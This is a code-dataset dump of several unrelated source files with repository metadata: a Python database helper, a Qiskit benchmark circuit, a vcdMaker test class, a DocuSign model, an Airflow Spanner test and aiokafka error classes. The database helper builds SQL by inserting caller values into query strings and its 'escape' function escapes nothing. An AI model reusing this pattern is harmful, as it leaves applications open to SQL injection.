] | 1 | 2021-08-04T13:00:00.000Z | 2021-08-04T13:00:00.000Z | kbr/db_utils.py | brugger/kbr-tools | 95c8f8274e28b986e7fd91c8404026433488c940 | [
"MIT"
] | null | null | null | """
Generica low level function for interacting with a database through the records package
"""
import sys
import os
import pprint
pp = pprint.PrettyPrinter(indent=4)
import records
class DB( object ):
def __init__( self, url:str) -> bool:
""" connects to a database instance
Args:
url: as specified by sqlalchemy ( {driver}://{user}:{password}@{host}:{port}/{dbase}
Returns:
none
Raises:
RuntimeError on failure.
"""
self._db = records.Database( url )
self._fetchall = False
if url.startswith('sqlite'):
self._fetchall = True
def close(self):
""" Closes the db connection
"""
self._db.close()
def from_file(self, filename:str):
""" readin a sql file and execute the content
Args:
filename: file to read from
Returns:
None
Raises:
error on file not exist or sql errors
"""
if not os.path.isfile( filename ):
raise RuntimeError( "Files does not exist '{}'".format( filename ))
file_handle = open(filename, 'r')
content = file_handle.read()
file_handle.close()
for command in content.replace("\n", " ").split(';'):
if command.strip() == "":
continue
self.do(command)
def table_names(self) -> []:
""" get the names of the tables in the database
Args:
None
returns
table names in a list
raises:
None
"""
return self._db.get_table_names()
def table_exist(self, name:str) -> bool:
q = f"SELECT to_regclass('{name}')"
table = self._db.get_as_dict( q )
if table[0]['to_regclass'] is None:
return False
return True
def drop_tables(self) -> None:
""" Delete all tables in a database, useful if resetting it during devlopment """
for table in self.table_names():
db.do("DROP table IF EXISTS {} CASCADE".format( table ))
def do(self, sql:str) -> None:
""" execute a query
Args:
sql: query to execute
returns
the result of the query
raises:
None
"""
return self._db.query( sql, fetchall=self._fetchall )
def get_as_dict(self, sql:str) -> {}:
""" executes a query and returns the data as a dict
Args:
sql query to execute
Returns:
result as a dict, or dict list
Raises:
None
"""
return self.do( sql ).as_dict()
def count(self, sql:str) -> int:
""" executes a query and returns the number of rows generated
Args:
sql query to execute
Returns:
nr of rows, 0 if none found
Raises:
None
"""
res = self.do( sql ).all()
return len( res )
def get(self, table, logic:str='AND', order:str=None, limit:int=None, offset:int=None, **values ) -> {}:
q = "SELECT * FROM {table} ".format( table = table )
filters = []
for key in values.keys():
if ( values[ key ] is not None):
filters.append( " {key} = '{value}'".format( key=key, value=values[ key ]))
if ( filters != []):
q += " WHERE " + " {} ".format( logic ).join( filters )
if order is not None:
q += " ORDER BY {order}".format( order=order )
if limit is not None:
q += " limit {} ".format( limit )
if offset is not None:
q += " offset {} ".format( offset )
return self.get_as_dict( q )
def get_single(self, table, **values ) -> {}:
values = self.get(table, **values)
if len( values ) > 1:
raise RuntimeError('get_single returned multiple values')
elif len( values ) == 1:
return values[ 0 ]
else:
return None
def get_all( self, table:str, order:str=None):
return self.get(table=table, order=order)
def get_by_id(self, table, value ) -> {}:
return self.get( table, id=value)
def escape_string(self, string):
return "'{}'".format( string )
def get_id(self, table, **values ) -> id:
ids = []
for res in self.get(table, **values):
ids.append( res[ 'id' ])
if len( ids ) == 0:
return None
elif len( ids ) == 1:
return ids[ 0 ]
else:
return ids
def add( self, table:str, entry:{}):
if entry == {}:
raise RuntimeError('No values provided')
keys = list( entry.keys())
values = entry.values()
q = "INSERT INTO {table} ({keys}) VALUES ({values})".format( table = table,
keys=",".join(keys),
values=",".join(map( self.escape_string, values)))
self.do( q )
def add_unique( self, table:str, entry:{}, key:str):
if entry == {}:
raise RuntimeError('No values provided')
ids = self.get_id( table, **{key:entry[ key ]})
if ids is not None:
return ids
try:
self.add( table, entry )
except:
# Expect the value already to have been added in the mean time...
pass
return self.get_id( table, **{key: entry[ key ]})
def add_bulk( self, table:str, entries:[] ):
if entries == [] or entries == {}:
raise RuntimeError('No values provided')
all_values = []
keys = list(entries[ 0 ].keys())
for entry in entries:
if keys != list(entry.keys()):
raise RuntimeError( 'Not the same keys in all entries!')
values = entry.values()
all_values.append( "({values})".format( values=",".join( map(self.escape_string, values))))
q = "INSERT INTO {table} ({keys}) VALUES {values}".format( table = table,
keys=",".join(keys),
values=",".join(all_values))
self.do( q )
def update(self, table:str, entry:{}, conditions:{}):
if entry == {}:
raise RuntimeError('No values provided')
if conditions == [] :
raise RuntimeError('No conditions provided')
updates = []
for key, value in entry.items():
if ( key in conditions ):
continue
updates.append( "{key} = '{value}'".format( key=key, value=value))
conds = []
for key in conditions:
#if ( key not in entry ):
# raise RuntimeError('condition key not in the entry dict')
conds.append( "{key} = '{value}'".format( key=key, value=conditions[ key ]))
q = "UPDATE {table} set {updates} WHERE {conds}".format( table = table,
updates=", ".join(updates),
conds=" and ".join(conds))
self.do( q )
def delete(self, table:str, id:int):
q = "DELETE FROM {table} WHERE id = '{id}'".format( table = table,
id=id)
self.do( q )
| 24.107362 | 119 | 0.473088 |
2a7e9b3c03bd16bc817718fed5aa6386ae79b749 | 7,069 | py | Python | data/p3BR/R2/benchmark/startQiskit_QC302.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | data/p3BR/R2/benchmark/startQiskit_QC302.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | data/p3BR/R2/benchmark/startQiskit_QC302.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | # qubit number=3
# total number=61
import numpy as np
from qiskit import QuantumCircuit, execute, Aer, QuantumRegister, ClassicalRegister, transpile, BasicAer, IBMQ
from qiskit.visualization import plot_histogram
from typing import *
from pprint import pprint
from math import log2
from collections import Counter
from qiskit.test.mock import FakeVigo, FakeYorktown
kernel = 'circuit/bernstein'
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
def build_oracle(n: int, f: Callable[[str], str]) -> QuantumCircuit:
# implement the oracle O_f
# NOTE: use multi_control_toffoli_gate ('noancilla' mode)
# https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html
# https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates
# https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
# oracle.draw('mpl', filename=(kernel + '-oracle.png'))
return oracle
def build_circuit(n: int, f: Callable[[str], str]) -> QuantumCircuit:
# implement the Bernstein-Vazirani circuit
zero = np.binary_repr(0, n)
b = f(zero)
# initial n + 1 bits
input_qubit = QuantumRegister(n+1, "qc")
classicals = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classicals)
# inverse last one (can be omitted if using O_f^\pm)
prog.x(input_qubit[n])
# circuit begin
prog.h(input_qubit[1]) # number=1
prog.h(input_qubit[2]) # number=38
prog.cz(input_qubit[0],input_qubit[2]) # number=39
prog.h(input_qubit[2]) # number=40
prog.cx(input_qubit[0],input_qubit[2]) # number=31
prog.h(input_qubit[2]) # number=42
prog.cz(input_qubit[0],input_qubit[2]) # number=43
prog.h(input_qubit[2]) # number=44
prog.h(input_qubit[2]) # number=48
prog.cz(input_qubit[0],input_qubit[2]) # number=49
prog.h(input_qubit[2]) # number=50
prog.h(input_qubit[2]) # number=58
prog.cz(input_qubit[0],input_qubit[2]) # number=59
prog.h(input_qubit[2]) # number=60
prog.x(input_qubit[2]) # number=55
prog.cx(input_qubit[0],input_qubit[2]) # number=56
prog.cx(input_qubit[0],input_qubit[2]) # number=47
prog.cx(input_qubit[0],input_qubit[2]) # number=37
prog.h(input_qubit[2]) # number=51
prog.cz(input_qubit[0],input_qubit[2]) # number=52
prog.h(input_qubit[2]) # number=53
prog.h(input_qubit[2]) # number=25
prog.cz(input_qubit[0],input_qubit[2]) # number=26
prog.h(input_qubit[2]) # number=27
prog.h(input_qubit[1]) # number=7
prog.cz(input_qubit[2],input_qubit[1]) # number=8
prog.rx(0.17592918860102857,input_qubit[2]) # number=34
prog.rx(-0.3989822670059037,input_qubit[1]) # number=30
prog.h(input_qubit[1]) # number=9
prog.h(input_qubit[1]) # number=18
prog.cz(input_qubit[2],input_qubit[1]) # number=19
prog.h(input_qubit[1]) # number=20
prog.y(input_qubit[1]) # number=14
prog.h(input_qubit[1]) # number=22
prog.cz(input_qubit[2],input_qubit[1]) # number=23
prog.rx(-0.9173450548482197,input_qubit[1]) # number=57
prog.h(input_qubit[1]) # number=24
prog.z(input_qubit[2]) # number=3
prog.z(input_qubit[1]) # number=41
prog.x(input_qubit[1]) # number=17
prog.y(input_qubit[2]) # number=5
prog.x(input_qubit[2]) # number=21
# apply H to get superposition
for i in range(n):
prog.h(input_qubit[i])
prog.h(input_qubit[n])
prog.barrier()
# apply oracle O_f
oracle = build_oracle(n, f)
prog.append(
oracle.to_gate(),
[input_qubit[i] for i in range(n)] + [input_qubit[n]])
# apply H back (QFT on Z_2^n)
for i in range(n):
prog.h(input_qubit[i])
prog.barrier()
# measure
return prog
def get_statevector(prog: QuantumCircuit) -> Any:
state_backend = Aer.get_backend('statevector_simulator')
statevec = execute(prog, state_backend).result()
quantum_state = statevec.get_statevector()
qubits = round(log2(len(quantum_state)))
quantum_state = {
"|" + np.binary_repr(i, qubits) + ">": quantum_state[i]
for i in range(2 ** qubits)
}
return quantum_state
def evaluate(backend_str: str, prog: QuantumCircuit, shots: int, b: str) -> Any:
# Q: which backend should we use?
# get state vector
quantum_state = get_statevector(prog)
# get simulate results
# provider = IBMQ.load_account()
# backend = provider.get_backend(backend_str)
# qobj = compile(prog, backend, shots)
# job = backend.run(qobj)
# job.result()
backend = Aer.get_backend(backend_str)
# transpile/schedule -> assemble -> backend.run
results = execute(prog, backend, shots=shots).result()
counts = results.get_counts()
a = Counter(counts).most_common(1)[0][0][::-1]
return {
"measurements": counts,
# "state": statevec,
"quantum_state": quantum_state,
"a": a,
"b": b
}
def bernstein_test_1(rep: str):
"""011 . x + 1"""
a = "011"
b = "1"
return bitwise_xor(bitwise_dot(a, rep), b)
def bernstein_test_2(rep: str):
"""000 . x + 0"""
a = "000"
b = "0"
return bitwise_xor(bitwise_dot(a, rep), b)
def bernstein_test_3(rep: str):
"""111 . x + 1"""
a = "111"
b = "1"
return bitwise_xor(bitwise_dot(a, rep), b)
if __name__ == "__main__":
n = 2
a = "11"
b = "1"
f = lambda rep: \
bitwise_xor(bitwise_dot(a, rep), b)
prog = build_circuit(n, f)
sample_shot =4000
writefile = open("../data/startQiskit_QC302.csv", "w")
# prog.draw('mpl', filename=(kernel + '.png'))
IBMQ.load_account()
provider = IBMQ.get_provider(hub='ibm-q')
provider.backends()
backend = provider.get_backend("ibmq_5_yorktown")
circuit1 = transpile(prog, FakeYorktown())
circuit1.h(qubit=2)
circuit1.x(qubit=3)
circuit1.measure_all()
info = execute(circuit1,backend=backend, shots=sample_shot).result().get_counts()
print(info, file=writefile)
print("results end", file=writefile)
print(circuit1.depth(), file=writefile)
print(circuit1, file=writefile)
writefile.close()
| 31.699552 | 140 | 0.638138 |
60b6c6ead60943891b9261f5369955c994eb57de | 2,434 | py | Python | test/functional/test.py | WojciechRynczuk/vcdMaker | 9432d45164806d583016df586f515b0e335304e6 | [
"MIT"
] | 32 | 2016-02-08T13:09:58.000Z | 2021-12-22T11:50:42.000Z | test/functional/test.py | WojciechRynczuk/vcdMaker | 9432d45164806d583016df586f515b0e335304e6 | [
"MIT"
] | 46 | 2016-07-13T12:21:26.000Z | 2020-12-27T17:19:36.000Z | test/functional/test.py | WojciechRynczuk/vcdMaker | 9432d45164806d583016df586f515b0e335304e6 | [
"MIT"
] | 1 | 2018-01-05T06:15:09.000Z | 2018-01-05T06:15:09.000Z | # test.py
#
# The base test class.
#
# Copyright (c) 2019 vcdMaker team
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from flat import CommonFlat, InfoFlat
class Test(object):
"""The base test class."""
def __init__(self, node, test_directory):
"""The base test class constructor.
Arguments:
node - The XML node to be read.
test_directory - The test directory.
"""
for element in node:
if (element.tag == 'info'):
self.info = InfoFlat(element)
if (element.tag == 'common'):
self.common = CommonFlat(element, test_directory)
def get_command(self):
"""Returns a list of command line parameters."""
return self.command
def get_output_file(self):
"""Returns the absolute path to the test output file."""
return self.common.get_output_file()
def get_golden_file(self):
"""Returns the absolute path to the test golden file."""
return self.common.get_golden_file()
def get_stdout_file(self):
"""Returns the absolute path to the test standard output file."""
return self.common.get_stdout_file()
def get_name(self):
"""Returns the test name."""
return self.info.get_test_name()
def get_description(self):
"""Returns the test description."""
return self.info.get_test_description()
| 32.891892 | 79 | 0.687346 |
aea05f79290935c6c3b81bf19b3cf6097eeac81d | 4,706 | py | Python | env/lib/python3.7/site-packages/docusign_admin/models/organization_export_request.py | davidgacc/docusign | e63167101656d0066d481844576ce687ea80eb91 | [
"MIT"
] | null | null | null | env/lib/python3.7/site-packages/docusign_admin/models/organization_export_request.py | davidgacc/docusign | e63167101656d0066d481844576ce687ea80eb91 | [
"MIT"
] | null | null | null | env/lib/python3.7/site-packages/docusign_admin/models/organization_export_request.py | davidgacc/docusign | e63167101656d0066d481844576ce687ea80eb91 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
DocuSign Admin API
An API for an organization administrator to manage organizations, accounts and users # noqa: E501
OpenAPI spec version: v2
Contact: devcenter@docusign.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class OrganizationExportRequest(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'type': 'str',
'accounts': 'list[OrganizationExportAccount]',
'domains': 'list[OrganizationExportDomain]'
}
attribute_map = {
'type': 'type',
'accounts': 'accounts',
'domains': 'domains'
}
def __init__(self, type=None, accounts=None, domains=None): # noqa: E501
"""OrganizationExportRequest - a model defined in Swagger""" # noqa: E501
self._type = None
self._accounts = None
self._domains = None
self.discriminator = None
if type is not None:
self.type = type
if accounts is not None:
self.accounts = accounts
if domains is not None:
self.domains = domains
@property
def type(self):
"""Gets the type of this OrganizationExportRequest. # noqa: E501
:return: The type of this OrganizationExportRequest. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this OrganizationExportRequest.
:param type: The type of this OrganizationExportRequest. # noqa: E501
:type: str
"""
self._type = type
@property
def accounts(self):
"""Gets the accounts of this OrganizationExportRequest. # noqa: E501
:return: The accounts of this OrganizationExportRequest. # noqa: E501
:rtype: list[OrganizationExportAccount]
"""
return self._accounts
@accounts.setter
def accounts(self, accounts):
"""Sets the accounts of this OrganizationExportRequest.
:param accounts: The accounts of this OrganizationExportRequest. # noqa: E501
:type: list[OrganizationExportAccount]
"""
self._accounts = accounts
@property
def domains(self):
"""Gets the domains of this OrganizationExportRequest. # noqa: E501
:return: The domains of this OrganizationExportRequest. # noqa: E501
:rtype: list[OrganizationExportDomain]
"""
return self._domains
@domains.setter
def domains(self, domains):
"""Sets the domains of this OrganizationExportRequest.
:param domains: The domains of this OrganizationExportRequest. # noqa: E501
:type: list[OrganizationExportDomain]
"""
self._domains = domains
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(OrganizationExportRequest, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, OrganizationExportRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 28.011905 | 102 | 0.586698 |
460ff914475ee1f4d2b8bd0d9de1408b5ac91652 | 1,874 | py | Python | tests/providers/google/cloud/operators/test_spanner_system.py | rliuamzn/airflow | 177dfbd12a42a5c229640c6c830f43f280ea5caa | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 3 | 2021-07-30T17:29:38.000Z | 2022-03-06T08:44:23.000Z | tests/providers/google/cloud/operators/test_spanner_system.py | rliuamzn/airflow | 177dfbd12a42a5c229640c6c830f43f280ea5caa | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 210 | 2021-07-17T00:25:52.000Z | 2021-12-29T00:44:48.000Z | tests/providers/google/cloud/operators/test_spanner_system.py | rliuamzn/airflow | 177dfbd12a42a5c229640c6c830f43f280ea5caa | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 3 | 2020-06-30T02:38:17.000Z | 2022-01-19T06:14:08.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import pytest
from airflow.providers.google.cloud.example_dags.example_spanner import (
GCP_PROJECT_ID,
GCP_SPANNER_INSTANCE_ID,
)
from tests.providers.google.cloud.utils.gcp_authenticator import GCP_SPANNER_KEY
from tests.test_utils.gcp_system_helpers import CLOUD_DAG_FOLDER, GoogleSystemTest, provide_gcp_context
@pytest.mark.backend("mysql", "postgres")
@pytest.mark.credential_file(GCP_SPANNER_KEY)
class CloudSpannerExampleDagsTest(GoogleSystemTest):
@provide_gcp_context(GCP_SPANNER_KEY)
def tearDown(self):
self.execute_with_ctx(
[
'gcloud',
'spanner',
'--project',
GCP_PROJECT_ID,
'--quiet',
'--verbosity=none',
'instances',
'delete',
GCP_SPANNER_INSTANCE_ID,
],
key=GCP_SPANNER_KEY,
)
super().tearDown()
@provide_gcp_context(GCP_SPANNER_KEY)
def test_run_example_dag_spanner(self):
self.run_dag('example_gcp_spanner', CLOUD_DAG_FOLDER)
| 35.358491 | 103 | 0.698506 |
c329758bd0d46b668156ac82780d503864939eb3 | 12,781 | py | Python | aiokafka/errors.py | FedirAlifirenko/aiokafka | 96159c6f74873005d0c123b07ec80fb1756f6c8a | [
"Apache-2.0"
] | null | null | null | aiokafka/errors.py | FedirAlifirenko/aiokafka | 96159c6f74873005d0c123b07ec80fb1756f6c8a | [
"Apache-2.0"
] | null | null | null | aiokafka/errors.py | FedirAlifirenko/aiokafka | 96159c6f74873005d0c123b07ec80fb1756f6c8a | [
"Apache-2.0"
] | null | null | null | import inspect
import sys
from kafka.errors import (
KafkaError,
IllegalStateError,
IllegalArgumentError,
NoBrokersAvailable,
NodeNotReadyError,
KafkaProtocolError,
CorrelationIdError,
Cancelled,
TooManyInFlightRequests,
StaleMetadata,
UnrecognizedBrokerVersion,
CommitFailedError,
AuthenticationMethodNotSupported,
AuthenticationFailedError,
BrokerResponseError,
# Numbered errors
NoError, # 0
UnknownError, # -1
OffsetOutOfRangeError, # 1
CorruptRecordException, # 2
UnknownTopicOrPartitionError, # 3
InvalidFetchRequestError, # 4
LeaderNotAvailableError, # 5
NotLeaderForPartitionError, # 6
RequestTimedOutError, # 7
BrokerNotAvailableError, # 8
ReplicaNotAvailableError, # 9
MessageSizeTooLargeError, # 10
StaleControllerEpochError, # 11
OffsetMetadataTooLargeError, # 12
StaleLeaderEpochCodeError, # 13
GroupLoadInProgressError, # 14
GroupCoordinatorNotAvailableError, # 15
NotCoordinatorForGroupError, # 16
InvalidTopicError, # 17
RecordListTooLargeError, # 18
NotEnoughReplicasError, # 19
NotEnoughReplicasAfterAppendError, # 20
InvalidRequiredAcksError, # 21
IllegalGenerationError, # 22
InconsistentGroupProtocolError, # 23
InvalidGroupIdError, # 24
UnknownMemberIdError, # 25
InvalidSessionTimeoutError, # 26
RebalanceInProgressError, # 27
InvalidCommitOffsetSizeError, # 28
TopicAuthorizationFailedError, # 29
GroupAuthorizationFailedError, # 30
ClusterAuthorizationFailedError, # 31
InvalidTimestampError, # 32
UnsupportedSaslMechanismError, # 33
IllegalSaslStateError, # 34
UnsupportedVersionError, # 35
TopicAlreadyExistsError, # 36
InvalidPartitionsError, # 37
InvalidReplicationFactorError, # 38
InvalidReplicationAssignmentError, # 39
InvalidConfigurationError, # 40
NotControllerError, # 41
InvalidRequestError, # 42
UnsupportedForMessageFormatError, # 43
PolicyViolationError, # 44
KafkaUnavailableError,
KafkaTimeoutError,
ConnectionError,
)
__all__ = [
# aiokafka custom errors
"ConsumerStoppedError", "NoOffsetForPartitionError", "RecordTooLargeError",
"ProducerClosed",
# Kafka Python errors
"KafkaError",
"IllegalStateError",
"IllegalArgumentError",
"NoBrokersAvailable",
"NodeNotReadyError",
"KafkaProtocolError",
"CorrelationIdError",
"Cancelled",
"TooManyInFlightRequests",
"StaleMetadata",
"UnrecognizedBrokerVersion",
"CommitFailedError",
"AuthenticationMethodNotSupported",
"AuthenticationFailedError",
"BrokerResponseError",
# Numbered errors
"NoError", # 0
"UnknownError", # -1
"OffsetOutOfRangeError", # 1
"CorruptRecordException", # 2
"UnknownTopicOrPartitionError", # 3
"InvalidFetchRequestError", # 4
"LeaderNotAvailableError", # 5
"NotLeaderForPartitionError", # 6
"RequestTimedOutError", # 7
"BrokerNotAvailableError", # 8
"ReplicaNotAvailableError", # 9
"MessageSizeTooLargeError", # 10
"StaleControllerEpochError", # 11
"OffsetMetadataTooLargeError", # 12
"StaleLeaderEpochCodeError", # 13
"GroupLoadInProgressError", # 14
"GroupCoordinatorNotAvailableError", # 15
"NotCoordinatorForGroupError", # 16
"InvalidTopicError", # 17
"RecordListTooLargeError", # 18
"NotEnoughReplicasError", # 19
"NotEnoughReplicasAfterAppendError", # 20
"InvalidRequiredAcksError", # 21
"IllegalGenerationError", # 22
"InconsistentGroupProtocolError", # 23
"InvalidGroupIdError", # 24
"UnknownMemberIdError", # 25
"InvalidSessionTimeoutError", # 26
"RebalanceInProgressError", # 27
"InvalidCommitOffsetSizeError", # 28
"TopicAuthorizationFailedError", # 29
"GroupAuthorizationFailedError", # 30
"ClusterAuthorizationFailedError", # 31
"InvalidTimestampError", # 32
"UnsupportedSaslMechanismError", # 33
"IllegalSaslStateError", # 34
"UnsupportedVersionError", # 35
"TopicAlreadyExistsError", # 36
"InvalidPartitionsError", # 37
"InvalidReplicationFactorError", # 38
"InvalidReplicationAssignmentError", # 39
"InvalidConfigurationError", # 40
"NotControllerError", # 41
"InvalidRequestError", # 42
"UnsupportedForMessageFormatError", # 43
"PolicyViolationError", # 44
"KafkaUnavailableError",
"KafkaTimeoutError",
"ConnectionError",
]
class CoordinatorNotAvailableError(GroupCoordinatorNotAvailableError):
message = "COORDINATOR_NOT_AVAILABLE"
class NotCoordinatorError(NotCoordinatorForGroupError):
message = "NOT_COORDINATOR"
class CoordinatorLoadInProgressError(GroupLoadInProgressError):
message = "COORDINATOR_LOAD_IN_PROGRESS"
InvalidMessageError = CorruptRecordException
GroupCoordinatorNotAvailableError = CoordinatorNotAvailableError
NotCoordinatorForGroupError = NotCoordinatorError
GroupLoadInProgressError = CoordinatorLoadInProgressError
class ConsumerStoppedError(Exception):
""" Raised on `get*` methods of Consumer if it's cancelled, even pending
ones.
"""
class IllegalOperation(Exception):
""" Raised if you try to execute an operation, that is not available with
current configuration. For example trying to commit if no group_id was
given.
"""
class NoOffsetForPartitionError(KafkaError):
pass
class RecordTooLargeError(KafkaError):
pass
class ProducerClosed(KafkaError):
pass
class ProducerFenced(KafkaError):
""" Another producer with the same transactional ID went online.
NOTE: As it seems this will be raised by Broker if transaction timeout
occured also.
"""
def __init__(
self,
msg="There is a newer producer using the same transactional_id or"
"transaction timeout occured (check that processing time is "
"below transaction_timeout_ms)"
):
super().__init__(msg)
class OutOfOrderSequenceNumber(BrokerResponseError):
errno = 45
message = 'OUT_OF_ORDER_SEQUENCE_NUMBER'
description = 'The broker received an out of order sequence number'
class DuplicateSequenceNumber(BrokerResponseError):
errno = 46
message = 'DUPLICATE_SEQUENCE_NUMBER'
description = 'The broker received a duplicate sequence number'
class InvalidProducerEpoch(BrokerResponseError):
errno = 47
message = 'INVALID_PRODUCER_EPOCH'
description = (
'Producer attempted an operation with an old epoch. Either '
'there is a newer producer with the same transactionalId, or the '
'producer\'s transaction has been expired by the broker.'
)
class InvalidTxnState(BrokerResponseError):
errno = 48
message = 'INVALID_TXN_STATE'
description = (
'The producer attempted a transactional operation in an invalid state'
)
class InvalidProducerIdMapping(BrokerResponseError):
errno = 49
message = 'INVALID_PRODUCER_ID_MAPPING'
description = (
'The producer attempted to use a producer id which is not currently '
'assigned to its transactional id'
)
class InvalidTransactionTimeout(BrokerResponseError):
errno = 50
message = 'INVALID_TRANSACTION_TIMEOUT'
description = (
'The transaction timeout is larger than the maximum value allowed by'
' the broker (as configured by transaction.max.timeout.ms).'
)
class ConcurrentTransactions(BrokerResponseError):
errno = 51
message = 'CONCURRENT_TRANSACTIONS'
description = (
'The producer attempted to update a transaction while another '
'concurrent operation on the same transaction was ongoing'
)
class TransactionCoordinatorFenced(BrokerResponseError):
errno = 52
message = 'TRANSACTION_COORDINATOR_FENCED'
description = (
'Indicates that the transaction coordinator sending a WriteTxnMarker'
' is no longer the current coordinator for a given producer'
)
class TransactionalIdAuthorizationFailed(BrokerResponseError):
errno = 53
message = 'TRANSACTIONAL_ID_AUTHORIZATION_FAILED'
description = 'Transactional Id authorization failed'
class SecurityDisabled(BrokerResponseError):
errno = 54
message = 'SECURITY_DISABLED'
description = 'Security features are disabled'
class OperationNotAttempted(BrokerResponseError):
errno = 55
message = 'OPERATION_NOT_ATTEMPTED'
description = (
'The broker did not attempt to execute this operation. This may happen'
' for batched RPCs where some operations in the batch failed, causing '
'the broker to respond without trying the rest.'
)
class KafkaStorageError(BrokerResponseError):
errno = 56
message = 'KAFKA_STORAGE_ERROR'
description = (
'The user-specified log directory is not found in the broker config.'
)
class LogDirNotFound(BrokerResponseError):
errno = 57
message = 'LOG_DIR_NOT_FOUND'
description = (
'The user-specified log directory is not found in the broker config.'
)
class SaslAuthenticationFailed(BrokerResponseError):
errno = 58
message = 'SASL_AUTHENTICATION_FAILED'
description = 'SASL Authentication failed.'
class UnknownProducerId(BrokerResponseError):
errno = 59
message = 'UNKNOWN_PRODUCER_ID'
description = (
'This exception is raised by the broker if it could not locate the '
'producer metadata associated with the producerId in question. This '
'could happen if, for instance, the producer\'s records were deleted '
'because their retention time had elapsed. Once the last records of '
'the producerId are removed, the producer\'s metadata is removed from'
' the broker, and future appends by the producer will return this '
'exception.'
)
class ReassignmentInProgress(BrokerResponseError):
errno = 60
message = 'REASSIGNMENT_IN_PROGRESS'
description = 'A partition reassignment is in progress'
class DelegationTokenAuthDisabled(BrokerResponseError):
errno = 61
message = 'DELEGATION_TOKEN_AUTH_DISABLED'
description = 'Delegation Token feature is not enabled'
class DelegationTokenNotFound(BrokerResponseError):
errno = 62
message = 'DELEGATION_TOKEN_NOT_FOUND'
description = 'Delegation Token is not found on server.'
class DelegationTokenOwnerMismatch(BrokerResponseError):
errno = 63
message = 'DELEGATION_TOKEN_OWNER_MISMATCH'
description = 'Specified Principal is not valid Owner/Renewer.'
class DelegationTokenRequestNotAllowed(BrokerResponseError):
errno = 64
message = 'DELEGATION_TOKEN_REQUEST_NOT_ALLOWED'
description = (
'Delegation Token requests are not allowed on PLAINTEXT/1-way SSL '
'channels and on delegation token authenticated channels.'
)
class DelegationTokenAuthorizationFailed(BrokerResponseError):
errno = 65
message = 'DELEGATION_TOKEN_AUTHORIZATION_FAILED'
description = 'Delegation Token authorization failed.'
